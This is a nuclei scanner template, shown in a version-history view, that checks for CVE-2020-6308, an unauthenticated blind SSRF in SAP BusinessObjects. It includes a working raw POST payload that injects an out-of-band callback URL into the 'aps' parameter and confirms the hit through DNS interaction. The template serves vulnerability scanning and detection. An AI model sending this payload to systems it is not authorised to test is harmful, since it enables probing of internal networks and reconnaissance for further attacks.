nuclei-templates/cves/2020/CVE-2020-6308.yaml

40 lines
1.7 KiB
YAML
Raw Normal View History

2021-06-02 06:09:27 +00:00
id: CVE-2020-6308
info:
2022-10-28 13:45:54 +00:00
name: SAP - Unauthenticated Blind SSRF
2021-06-02 06:09:27 +00:00
author: madrobot
severity: medium
2022-10-19 02:13:15 +00:00
description: |
SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.
reference:
- https://github.com/InitRoot/CVE-2020-6308-PoC
- https://launchpad.support.sap.com/#/notes/2943844
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=558632196
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2020-6308
cwe-id: CWE-918
2022-10-28 13:45:54 +00:00
tags: cve,cve2020,sap,ssrf,oast,unauth
2021-06-02 06:09:27 +00:00
requests:
2022-10-19 02:13:15 +00:00
- raw:
2022-10-28 13:45:54 +00:00
- |
2022-10-19 02:13:15 +00:00
POST /AdminTools/querybuilder/logon?framework= HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2021-06-02 06:09:27 +00:00
2022-10-19 02:13:15 +00:00
aps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
2021-06-02 06:09:27 +00:00
2022-10-19 02:13:15 +00:00
matchers-condition: and
2021-06-02 06:09:27 +00:00
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
2022-10-19 02:13:15 +00:00
2022-10-19 17:00:59 +00:00
- type: word
part: location
2022-10-28 13:50:08 +00:00
words:
- "{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"